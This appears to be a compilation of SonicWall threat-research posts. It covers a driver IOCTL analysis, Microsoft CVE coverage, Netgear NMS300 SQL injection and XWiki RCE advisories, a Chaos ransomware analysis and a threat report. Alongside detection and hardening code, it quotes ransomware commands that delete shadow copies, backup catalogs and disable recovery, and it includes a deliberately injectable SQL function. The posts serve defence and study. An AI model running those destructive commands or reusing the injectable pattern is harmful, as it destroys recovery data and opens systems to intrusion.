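    for code in (IOCTL_REGISTER_TRUSTED, IOCTL_TERMINATE_PROCESS):
        print(hex(code), decode_ioctl(code))
    print(analyse_trace(SAMPLE_TRACE))
```

Both codes decode to device type 0x8000 with METHOD_BUFFERED and FILE_ANY_ACCESS, differing only in the vendor-range function number (0x804 and 0x812), which is what a driver-monitoring rule would key on together with the register-then-terminate order.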

 

Driver IOCTL functionality

The figure below shows the IOCTL handler functions in the installed driver:

Figure 11: Driver function to handle IOCTLs

Indicators Of Compromise (IOCs):

  • 2d3c9078e40a6dd286b36dbaaf1f0a367d22a0f9e30a2fc93d1d8ba5b9b97ce8 – Initial Payload (.Net Application)

SonicWall Capture Labs provides protection against this threat via the following signature:

  • Injector.RPX (Trojan)

Microsoft Security Bulletin Coverage for August 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-35359 Windows Kernel Elevation of Privilege Vulnerability
ASPY 467: Exploit-exe exe.MP_334

CVE-2023-35380 Windows Kernel Elevation of Privilege Vulnerability
ASPY 465: Exploit-exe exe.MP_332

CVE-2023-35382 Windows Kernel Elevation of Privilege Vulnerability
ASPY 466: Exploit-exe exe.MP_333

CVE-2023-35384 Windows HTML Platforms Security Feature Bypass Vulnerability
IPS 15908: Windows HTML Platforms Security Feature Bypass (CVE-2023-35384)

CVE-2023-35386 Windows Kernel Elevation of Privilege Vulnerability
ASPY 469: Exploit-exe exe.MP_336

CVE-2023-36900 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 470: Exploit-exe exe.MP_337

The following vulnerabilities do not have exploits in the wild:
CVE-2023-21709 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29328 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29330 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35368 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35371 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35372 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35376 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35377 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35378 Windows Projected File System Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35379 Reliability Analysis Metrics Calculation Engine (RACEng) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35381 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35383 Microsoft Message Queuing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35385 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35387 Windows Bluetooth A2DP driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35388 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35389 Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35390 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35391 ASP.NET Core SignalR and Visual Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35393 Azure Apache Hive Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-35394 Azure HDInsight Jupyter Notebook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36865 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36866 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36869 Azure DevOps Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36873 .NET Framework Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36876 Reliability Analysis Metrics Calculation (RacTask) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36877 Azure Apache Oozie Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36881 Azure Apache Ambari Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36882 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36889 Windows Group Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-36890 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36891 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36892 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36893 Microsoft Outlook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36894 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36895 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36896 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36897 Visual Studio Tools for Office Runtime Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36898 Tablet Windows User Interface Application Core Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36899 ASP.NET Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36903 Windows System Assessment Tool Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36904 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36905 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36906 Windows Cryptographic Services Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36907 Windows Cryptographic Services Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36908 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36909 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-36910 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36911 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36912 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-36913 Microsoft Message Queuing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36914 Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-38154 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38167 Microsoft Dynamics Business Central Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38169 Microsoft OLE DB Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38170 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38172 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-38175 Microsoft Windows Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38176 Azure Arc-Enabled Servers Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38178 .NET Core and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-38180 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-38181 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-38182 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38184 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38185 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38186 Windows Mobile Device Management Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38188 Azure Apache Hadoop Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-38254 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.

Netgear ProSAFE NMS300 SQLi Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Netgear ProSAFE Network Management System (NMS300) is a centralized and comprehensive management application designed for network administrators. It enables them to discover, monitor, configure, and report on SNMP-based enterprise-class network devices. The Netgear Network Management System NMS300 provides insights into network elements, including third-party devices, and its web-based user interface simplifies the process of monitoring and administering an entire network.

  An SQL injection vulnerability has been reported in Netgear ProSAFE NMS300. This vulnerability arises due to improper input validation in the getNodesByTopologyMapSearch component.

  A remote, authenticated attacker could exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation of this vulnerability could result in SQL injection or, in the worst-case scenario, remote code execution in the context of the SYSTEM user.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-38099.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  When a user navigates to the device list through the topology map search feature, an HTTP GET request is dispatched to the Request-URI “/topology.do?method=getDeviceListByDim”. Upon receipt of this request, the function TopologyMapController.getDeviceByDim() is invoked. This function displays the values of all devices identified in the preceding search request. Multiple parameter values are saved into different variables, with the ‘exclude’ parameter being of particular relevance to this vulnerability. The value for the ‘exclude’ parameter is stored in the ‘exclude’ variable.

  Following this, the NodeInfoDao.getNodesTopologyMapSearch() method is invoked, passing the ‘exclude’ variable’s value into the ‘equips’ variable. This function is responsible for constructing and running the SQL query needed to fetch the specified device list. The corresponding SQL query is stored as a string in the ‘sql’ variable:
  
  If the ‘equips’ variable’s value is not empty, the string ” and nodeId not in (equips) ” is appended to the ‘sql’ variable’s value (where equips is replaced by the ‘equips’ variable’s value). The SQL query contained in the ‘sql’ variable is then executed, and the result of the query is returned.
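
  As an added illustration (Python, not the product's Java code), the constructed snippet below places the same string-building flaw beside a hardened version that validates the id list and binds it as query parameters. The table name, column names, base query and sample rows are all assumptions made for the example.

```python
import sqlite3

# Constructed sample data: a tiny "nodes" table standing in for the NMS300 node
# inventory. Table and column names are assumptions, not the product's schema.
SAMPLE_NODES = [
    (1, "core-sw-01", "10.0.0.1"),
    (2, "edge-sw-02", "10.0.0.2"),
    (3, "ap-lobby",   "10.0.0.3"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nodes (nodeId INTEGER PRIMARY KEY, name TEXT, ip TEXT)")
    conn.executemany("INSERT INTO nodes VALUES (?, ?, ?)", SAMPLE_NODES)
    return conn


def get_nodes_vulnerable(conn: sqlite3.Connection, equips: str) -> list:
    """Mirrors the flawed pattern: the raw 'exclude' string is pasted into the SQL text.

    Whatever the client sends becomes part of the statement, so the exclusion
    clause can be rewritten by the caller.
    """
    sql = "SELECT nodeId, name, ip FROM nodes WHERE 1=1"   # base query is assumed
    if equips:
        sql += " and nodeId not in (" + equips + ") "
    return conn.execute(sql).fetchall()


def parse_node_ids(equips: str) -> list[int]:
    """Allow-list parser: accept only a comma-separated list of non-negative integers."""
    if not equips:
        return []
    ids = []
    for part in equips.split(","):
        part = part.strip()
        if not part.isdigit():   # rejects quotes, parentheses, keywords and comments
            raise ValueError(f"invalid node id: {part!r}")
        ids.append(int(part))
    return ids


def get_nodes_hardened(conn: sqlite3.Connection, equips: str) -> list:
    """Same query, but ids are validated first and passed as bound parameters."""
    ids = parse_node_ids(equips)
    sql = "SELECT nodeId, name, ip FROM nodes WHERE 1=1"
    params: list = []
    if ids:
        sql += " and nodeId not in (" + ",".join("?" * len(ids)) + ")"
        params = ids
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("hardened, exclude 1,2 ->", get_nodes_hardened(db, "1,2"))
    try:
        get_nodes_hardened(db, "1) or 1=1 or nodeId in (0")
    except ValueError as exc:
        print("hardened rejected:", exc)
```

  The vulnerable path splices the exclude string into the statement, so input that closes the parenthesis changes the WHERE clause and the exclusion no longer applies; the hardened path accepts only integers and lets the driver bind them, which is the code-level fix that belongs alongside the IPS signature below.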

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the vulnerable software.
  • The attacker must have permission to view the device list via the Topology map search component.

Triggering Conditions:

  The vulnerability is triggered when the server receives and processes an HTTP request that embeds an SQL injection in the request parameters.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
  What a successful GET Request might look like:
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 4001 NETGEAR ProSAFE NMS300 SQL Injection

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

A new variant of the Chaos Ransomware family surfaces

The SonicWall Capture Labs Research team has received a sample of a new variant of the Chaos ransomware family. Chaos is a customizable ransomware builder that emerged on underground forums, falsely marketing itself as the .NET version of Ryuk.

The builder exposes the following options, which an operator can use to customize the ransomware:

  • processName = "svchost.exe";
  • sleepTextbox = 10;
  • spreadName = "surprise.exe";
  • userDir = "C:\\Users\\";
  • checkAdminPrivilage = true;
  • checkCopyRoaming = true;
  • checkdeleteBackupCatalog = true;
  • checkdeleteShadowCopies = true;
  • checkdisableRecoveryMode = true;
  • checkSleep = false;
  • checkSpread = true;
  • checkStartupFolder = true;
  • droppedMessageTextbox = "read_it.txt";
  • encryptedFileExtension = "";
  • encryptionAesRsa = true;
  • messages = new string[]; // Ransomware message content

Infection Cycle:

At the start of execution, it checks its own filename and the location it is running from.

If its process name and location are not %appdata%\\svchost.exe, it drops a copy of itself to %appdata%\\svchost.exe and launches it.

It then checks the checkSleep option supplied at build time. If the value is false, it skips the sleepOutOfTempFolder() function. That function also checks the folder it is running from; if the path does not match, it takes the sleepTextbox value, multiplies it by 1000, and passes the result to a thread that sleeps for that many milliseconds.

It then checks the checkStartupFolder flag and, if it is true, calls the addLinkToStartup() function.

That function creates a file named svchost.url containing the location of the dropped file and copies it into the user's Startup folder so that the malware runs automatically at every system startup.

It has a hardcoded list of directories; only files in those directories whose extension is on its list are encrypted.

List of the extensions

Before encrypting a file, it checks that the file's extension is on the list of valid extensions and that the filename is not the one given in droppedMessageTextbox at build time.

droppedMessageTextbox holds the name of the file that carries the ransom note; in this sample it is "read_it.txt".

It then checks the file length. If the file is smaller than 2,117,152 bytes, it encrypts it using the EncryptFile method; if it is larger than 2,117,152 bytes, it instead generates a random string of random length between 200000000 and 300000000 bytes and encodes it using the randomEncode method.

It generates a 20-byte random password and converts it to a byte array using UTF-8 encoding. The file content is AES-encrypted with that key, and the key is then RSA-encrypted.

The AES-encrypted content is additionally Base64-encoded.

It then concatenates the RSA-encrypted key and the Base64-encoded content and writes them to the file using the File.WriteAllText method.

Finally, the original file is renamed in place with a random extension produced by the RandomStringForExtension method, and the "read_it.txt" ransom note is dropped in the same location.

Once encryption is done, it deletes Shadow Copies, disables Recovery Mode, and deletes the Backup Catalog using the commands below.

"vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
"bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"
"wbadmin delete catalog -quiet"
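
The three command lines above are the most reliably observable step of this infection chain, because they run as child processes and land in process-creation telemetry. The following added example (not from SonicWall or the sample) matches them in constructed process-creation events and raises a higher-confidence alert when several distinct recovery-inhibition techniques show up together. The event format, field names and rule names are assumptions made for the example.

```python
import re

# Detection rules for the recovery-inhibition commands quoted above.
# Each entry: (rule name, compiled regex). Matching is case-insensitive and
# tolerant of an optional ".exe" suffix and variable whitespace.
RULES = [
    ("shadow_copy_deletion_vssadmin",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("shadow_copy_deletion_wmic",
     re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("recovery_disabled_bcdedit",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*?(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("backup_catalog_deletion",
     re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I)),
]


def classify_command(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(events) -> list[tuple[int, str, str]]:
    """events: iterable of dicts with 'image' and 'cmdline' keys (assumed schema).

    Returns (event index, rule name, command line) for every match. One event
    can yield several hits, e.g. a cmd.exe line chaining two tools with '&'.
    """
    hits = []
    for i, ev in enumerate(events):
        for rule in classify_command(ev["cmdline"]):
            hits.append((i, rule, ev["cmdline"]))
    return hits


def recovery_inhibition_alert(events, threshold: int = 2) -> tuple[bool, list[str]]:
    """Alert when at least `threshold` distinct techniques appear in the batch.

    A lone shadow-copy deletion can be legitimate administration; a cluster of
    shadow deletion, recovery disabling and catalog deletion rarely is.
    """
    seen = sorted({rule for _, rule, _ in scan_events(events)})
    return len(seen) >= threshold, seen


# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures "
                "& bcdedit /set {default} recoveryenabled no"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c wbadmin delete catalog -quiet"},
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},   # benign: enumerates, does not delete
]


if __name__ == "__main__":
    for idx, rule, cmd in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {cmd}")
    fired, techniques = recovery_inhibition_alert(SAMPLE_EVENTS)
    print("alert:", fired, techniques)
```

The per-rule matches are useful on their own as hunting queries; the batch-level alert is what turns them into a high-confidence ransomware indicator, since the sample runs all three commands back to back once encryption finishes.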

To spread, it loops through all available drives on the system; if a drive is not C:\ and the spreadName file is not already present on it, it copies the malware to that drive under the specified spreadName.

This way the malware can potentially infect other machines whose drives are mapped onto the victim’s machine.

Once encryption is complete, it displays the ransom note text.

It sets the wallpaper shown below.

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV:MalAgent.RSM_99 (Ransomware)

XWiki RCE Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  XWiki is recognized as a second-generation wiki platform, bringing together the conventional wiki functionality and the unique potential of an application development platform. It showcases a broad array of features typical of a wiki, such as advanced access rights and effective user management. Additionally, XWiki’s defining trait lies in its capacity to allow the creation of new applications, which can be developed directly on top of the platform.

  A remote code execution vulnerability has been reported in XWiki. It stems from improper handling of documentTree macro parameters: because these parameters are not properly escaped, the platform is exposed to remote attack.

  A remote attacker can exploit this vulnerability by sending specially crafted requests to the server hosting XWiki. Successful exploitation allows the attacker to execute code remotely.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-29509.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  XWiki boasts a powerful scripting feature set, allowing users to create everything from simple to intricate web applications on an XWiki page (or view) layer. There is no need for users to compile code or deploy software components – instead, they can utilize scripting syntax alongside wiki markup directly within the content of an XWiki page.

  The platform supports a range of scripting languages, including Velocity, Groovy, and Python, all of which are enabled by default. XWiki incorporates the JSR-223 scripting platform, which facilitates the evaluation of script code. Additionally, XWiki provides a script macro that evaluates script code and is structured as follows:

  

  To declare script code for default enabled languages, users can directly use the language name:

  

  The standard XWiki flavor includes the “Flamingo Theme Application” extension. This allows users to customize site skins, and the extension has a macro “FlamingoThemesCode.WebHome”. This macro lists the sub-documents of any given document. When a page request is made with the GET parameter sheet set to “FlamingoThemesCode.WebHome”, the same macro is used to render the page. The parameter document:$doc.documentReference is set to the current page, and this value is passed to the documentTree macro, which in turn lists the sub-documents of the present page.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker requests a malicious page using the FlamingoThemesCode.WebHome view. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

  GET Request:
  
  URL Decoded:
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2062 XWiki Commons documentTree Remote Code Execution 1
  • IPS: 18914 XWiki Commons documentTree Remote Code Execution 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

First-Half 2023 Threat Intelligence: Tracking Cybercriminals Into the Shadows

Over the past five years, cybercriminal groups have become increasingly corporatized. The early 2020s even saw them starting to market themselves as they endeavored to become widely known — both to be taken more seriously and to build a reputation for “fair” dealings with their victims. Lesser-known groups were even known to borrow the branding of larger groups, hoping to cash in on the brand recognition surrounding them.

But while the paychecks kept pouring in, cybercriminal groups seemed to lose sight of one thing: they weren’t legal entities in the way the corporations they emulated were. In fact, there was nothing legal about them at all, as many were reminded when politicians and law enforcement ramped up enforcement efforts and they found the long arm of the law pointed squarely in their direction.

After every cybercriminal arrest, the same refrain is repeated: “We applaud the efforts of law enforcement, but we don’t expect the bust to bring about lasting change.” But a look at data from the first half of 2023, as reported in the just-released Mid-Year Update to the 2023 SonicWall Cyber Threat Report, brings this accepted notion into question, as we’ve seen threat actors begin to shun the spotlight and focus more on lower-risk activities such as cryptojacking, IoT malware and encrypted threats.

A graph depicting the rise of cryptojacking hits in 2023.

Malware Continues its Migration

Malware remained essentially flat year-to-date, falling just two percent compared with the first half of 2022. But that doesn’t mean there isn’t a great deal of change going on below the surface. With 1.3 billion hits (out of a global total of 2.7 billion), North America still sees the lion’s share of malware, but it was also the only region to record a decrease. In contrast, Europe and LATAM saw double-digit growth, suggesting that cybercriminals are shifting their attention to new shores.

Customers working in education and finance saw particularly large increases in malware, though none of the industries we examined showed a decrease.

Ransomware is Down, but Poised for a Turnaround

If cybercriminals are showing a greater interest in remaining under the radar, then a decrease in ransomware — a form of cybercrime that relies on the threat actors announcing and introducing themselves — should be expected. Still, with attack volumes down 41% over the first six months of 2022, many might wonder whether cybercriminals are giving up on ransomware for good.

There are a number of reasons we don’t think so, one of which is the trend line for ransomware as we moved through 2023. While the year-to-year trend line still points downward, on a month-by-month basis, we’ve actually seen ransomware rise, with a second quarter 74% higher than the first.

Cryptojacking’s Record Surge Continues

But if ransomware is down, what’s rising to take its place? We’ve seen an increase in several attack types, but perhaps the most pronounced has been in cryptojacking. The number of cryptojacking hits reached 332 million hits in the first half of 2023, up a staggering 399% year-to-date. This not only represents a new record high — it also puts 2023 on track to see more cryptojacking hits than all other years on record combined.

IoT Malware Jumps by More Than a Third

SonicWall Capture Labs threat researchers noted a continued increase in the amount of IoT malware in the first half of 2023, jumping 37% to 77.9 million. At this rate, the number of IoT malware attacks will easily eclipse last year’s total, itself a record high.

As we’ve seen with other threat types, North America saw a decrease in attacks. At a modest 3%, however, this dip was more than made up for by triple-digit jumps in Asia and Latin America. India, in particular, saw an outsized number of these attacks: IoT malware there skyrocketed 311%.

Malicious PDF and Office Files Fall by Double Digits

The number of attacks involving malicious PDFs dropped 10% in the first six months of 2023, but there was an even bigger decrease in the use of malicious Microsoft Office files: Those attacks fell a staggering 75% compared with the same time period in 2022. Some of this drop may be due to Microsoft’s recent efforts to increase security, but time will tell whether this is a sustained downturn or whether cybercriminals make inroads around these new restrictions.

“The seemingly endless digital assault on the enterprise, governments and global citizens is intensifying and the threat landscape continues to expand,” said SonicWall President and CEO Bob VanKirk. “Threat actors are relentless, and as our data indicates, more opportunistic than ever before, targeting schools, federal governments and retail organizations at unprecedented rates. The 2023 SonicWall Mid-Year Cyber Threat Report helps us understand both the criminal mindset and behavior, which will in turn help organizations protect themselves and build stronger defenses against malicious activities.”

Read the full report here.